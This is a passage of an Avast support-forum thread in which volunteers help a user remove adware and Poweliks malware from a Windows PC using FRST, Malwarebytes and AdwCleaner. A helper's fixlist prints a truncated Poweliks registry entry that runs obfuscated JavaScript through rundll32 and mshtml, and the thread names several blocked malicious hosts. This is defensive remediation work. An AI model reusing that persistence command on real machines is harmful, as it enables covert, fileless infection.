GO.WVYDEO.COM detected by Internet Security

Hi-
Over the last several days, I see frequent Avast alerts that go.wvydeo.com/resultsa/?… has been detected/blocked from iexplore.exe.
I searched on the topic and followed the information.
I could not find a program of any such name in my program listing to un-install.
I could not find a program of any such name in my explorer add-ins.
Please advise what logs and/or other information is required for assistance in removing this malware.

Regards,
Dave

https://forum.avast.com/index.php?topic=53253.0

Thanks Eddy.
When I try to download the Malwarebytes software, I get a popup window that says my current security settings will not allow this file to be downloaded.

I have not previously seen this alert when I tried to download/save a file. Can you tell me how to bypass this? I am reluctant to turn off AVAST if I have an infection. It seems like opening the barn doors. Can I try to download onto a thumbdrive from a different computer and copy the file over to the machine in question?

Regards,
Dave

Skip malwarebytes and attach the Farbar logs.

Same message for Farbar, “…current security settings do not allow this file to be downloaded…”
??

Can I try to download onto a thumbdrive from a different computer and copy the file over to the machine in question?
Yes....

When it rains it pours… I had unexpected connectivity issues with all of my computers.
I downloaded FRST to a thumb drive and copied it to the primary machine. I have attached the FRST and ADDITIONS txt files.
Please advise if I should do same for MBAM, as well as next steps.
Thanks,
Dave

I neglected to mention that when I ran the FRST, a message window popped up a few times that “Windows Powershell has stopped working”. The scan appeared to stop for a few moments, then resumed. I ignored the error until the end of the scan, then acknowledged it. Not sure if this was expected or not?

-Dave

One last bit of data.
I was able to install and execute MBAM.
68 non-Malware events were detected and recommended action was ‘Quarantine’.
I allowed the recommended action to occur.

The log is attached.

Please advise what steps I should take next, and do I just leave the quarantined items where they are?

Thanks and regards,
Dave

Did you run malwarebytes before or after FRST ?

MBAM should be run before FRST so that the diagnostic logs show what's left after MBAM has quarantined…

No, sorry.
I could not download any of the scanners on the primary machine due to ‘Security Settings’ (?).

In one of the first replies, ‘Eddy’ said to skip MBAM and proceed with FRST, so that is what I did.

Advise if I need to start over, and please verify the sequence.
-Dave

Since you had MBAM removing things, we will need fresh logs from Farbar.
And please do only as we say, don’t change anything on the system.

OK. Fresh files from Farbar. Note: no ‘Powershell stopped working’ errors popped up during this most recent scan.
Thanks for your patience.

-Dave

To all,
Any updates with regards to anything I should do?
Is there any other log that I need to post?

Thanks and regards,
Dave

Hi, DavKar. The warning about file downloads comes from Internet Explorer. If you open “Internet Options” and then click the “Security” tab, you can enable files to be downloaded.

On the Security tab, click the button labeled “Custom level…”
You should be presented with a long list of settings. If you scroll down, you will eventually see a
setting for “Downloads”. There will be a sub-setting for “File Download” and another for “Font Download”.

Click “Enable” for the File Download setting which I suspect is currently “Disable”-d. Accept the setting change for the Internet zone and you will be able to download files. Avast should still be checking downloads for badness, so if you download something else undesirable, you will hopefully get notified.

In my case, when I reboot my computer, this value is always reset to “Disable”. I have been struggling with this for some time, but I did not attribute it to Malware until the last few days, when I began to experience problems with the go.wvydeo issue.

I’m following this post with interest to see if there is a cure on the horizon.

Best Regards.
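
Added example, not part of the original posts: a read-only PowerShell check of the "File Download" setting described above. It assumes the standard Internet Explorer zone layout, where the Internet zone is zone 3 and "File Download" is stored as the value named 1803 (0 = Enable, 1 = Prompt, 3 = Disable), and reads both the preference and the policy keys.

```powershell
# Read-only check of the IE "File Download" setting (URL action 1803)
# for the Internet zone (zone 3). Nothing on the system is modified.
$zonePath       = 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'
$policyZonePath = 'Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'

# Policy keys take precedence over preferences, so they are listed first.
$locations = @(
    @{ Scope = 'Machine policy';     Path = "HKLM:\$policyZonePath" },
    @{ Scope = 'User policy';        Path = "HKCU:\$policyZonePath" },
    @{ Scope = 'Machine preference'; Path = "HKLM:\$zonePath" },
    @{ Scope = 'User preference';    Path = "HKCU:\$zonePath" }
)

# Meaning of the stored DWORD for this URL action.
$meaning = @{ 0 = 'Enable'; 1 = 'Prompt'; 3 = 'Disable' }

$report = foreach ($loc in $locations) {
    $value = $null
    if (Test-Path -Path $loc.Path) {
        # The value may be absent even when the key exists.
        $prop = Get-ItemProperty -Path $loc.Path -Name '1803' -ErrorAction SilentlyContinue
        if ($null -ne $prop) { $value = $prop.'1803' }
    }

    $setting = ''
    if ($null -ne $value) {
        $setting = 'Unknown'
        if ($meaning.ContainsKey([int]$value)) { $setting = $meaning[[int]$value] }
    }

    [pscustomobject]@{
        Scope   = $loc.Scope
        Key     = $loc.Path
        Value   = if ($null -eq $value) { '(not set)' } else { $value }
        Setting = $setting
    }
}

$report | Format-Table -AutoSize
```

Comparing the output before and after a reboot shows which of the four keys carries the "Disable" value that keeps coming back.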

Hi msfica,
Thanks for confirming what I read elsewhere. I have not changed the setting just yet - but I checked and it was set to ‘Disable’.

Especially in the evenings, AVAST displays numerous alerts of blocked attempts via IEXPLORE every minute or so. When I started this post for assistance, it was the go.wvydeo. The last couple of days, I see cdn1.moviereviews, cdn3.moviereviews, gamingprecision.api, s.vb3k.com/crossdomain, and a few URL-based, such as 199.115.116.235/redirect_js_new.php.

I do not know enough to understand what may be ok or a false positive, and what is ‘bad’. I am grateful that AVAST has blocked these attempts. I do not know if anything can be done about attempted attacks. MBAM did find some non-malware issues. Hopefully when the Forum backlog clears, someone can provide some insight.

This exactly describes the symptoms I see. Would guess the problem is with Avast and not any individual computer

To any/all Forum Specialists -
Is there anything else I need to provide in order to gain assistance? Any other logs?
I am unsure as to the rules of the forum, is assistance based upon FIFO or severity or something else?

I continue to receive alerts regarding the blocking of several URLs that I see other posters have reported.

Thanks in advance,

DavKar

Hi, you appear to have slipped through the net … Sorry :)

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
HKU\S-1-5-21-161080376-3053031705-4070085631-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
CustomCLSID: HKU\S-1-5-21-161080376-3053031705-4070085631-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
C:\Users\Public\dcmsvcsetup.exe
C:\Users\Public\invokesi.exe
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated; please post that.

THEN

Please download AdwCleaner by Xplode onto your desktop.

- Close all open programs and internet browsers.
- Double click on AdwCleaner.exe to run the tool.
- Click on Scan.
- After the scan is complete click on “Clean”.
- Confirm each time with Ok.
- Your computer will be rebooted automatically. A text file will open after the restart.
- Please post the content of that logfile with your next answer.
- You can find the logfile at C:\AdwCleaner[S1].txt as well.

Hi Essexboy-
Thanks for the response.
FRST has been running about an hour. It has been on 'Deleting C:\Users\namehere\AppData\Local\Temp' for a long time. The progress bar is still moving, but I am not sure if there is any hard drive activity.

Is this normal?
Also, when the FRST scan is complete and I have posted the log, can I proceed with AdwCleaner without waiting for a review of the FRST log?

Note, I am sending this from another machine. I did not want to interrupt the one undergoing the scan/fix from FRST.

Regards,
DavKar